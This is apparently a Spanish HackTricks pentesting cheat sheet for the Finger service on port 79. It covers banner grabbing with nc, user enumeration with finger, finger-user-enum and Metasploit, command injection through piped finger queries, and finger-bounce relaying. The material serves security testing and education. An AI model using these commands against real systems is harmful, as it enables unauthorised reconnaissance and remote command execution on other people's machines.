79 - Pentesting Finger
Tip
Aprende y practica Hacking en AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Hacking en Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Información Básica
El programa/servicio Finger se utiliza para recuperar detalles sobre los usuarios de computadoras. Típicamente, la información proporcionada incluye el nombre de inicio de sesión del usuario, nombre completo, y, en algunos casos, detalles adicionales. Estos detalles adicionales podrían abarcar la ubicación de la oficina y el número de teléfono (si está disponible), la hora en que el usuario inició sesión, el período de inactividad (tiempo inactivo), la última vez que el correo fue leído por el usuario, y el contenido de los archivos de plan y proyecto del usuario.
Puerto por defecto: 79
PORT STATE SERVICE
79/tcp open finger
Enumeración
Captura de Banner/Conexión básica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeración de usuarios
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap ejecuta un script para hacer usando scripts predeterminados
Metasploit utiliza más trucos que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Ejecución de comandos
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Usar un sistema como un relé de finger
finger user@host@victim
finger @internal@external
Tip
Aprende y practica Hacking en AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Hacking en Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.


